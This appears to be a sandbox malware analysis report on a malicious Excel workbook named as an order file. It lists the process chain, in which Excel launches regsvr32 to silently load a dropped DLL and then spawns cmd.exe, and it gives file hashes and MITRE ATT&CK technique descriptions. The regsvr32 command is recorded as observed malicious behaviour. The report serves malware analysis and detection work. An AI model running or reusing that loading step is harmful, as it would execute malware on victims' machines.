00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AAAAAAAAAASAAArAA"AArAArAARichAPELt`!@P d`UPi#0P.text7@ `.rdataPP@@.datac0@.rsrciPp@@.reloc_`@B

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 3292 Parent PID: 792

General

Start time:	23:54:43
Start date:	09/06/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0xc0000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: regsvr32.exe PID: 5852 Parent PID: 3292

General

Start time:	23:54:48
Start date:	09/06/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32 -s ..\kdldyeff.dll
Imagebase:	0x1310000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 5964 Parent PID: 5852

General

Start time:	23:55:38
Start date:	09/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\cmd.exe
Imagebase:
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Total_order_data-V2434883.xlsb

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Total_order_data-V2434883.xlsb"

Indicators

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

Behavior

System Behavior

Analysis Process: EXCEL.EXE PID: 3292 Parent PID: 792

General

Analysis Process: regsvr32.exe PID: 5852 Parent PID: 3292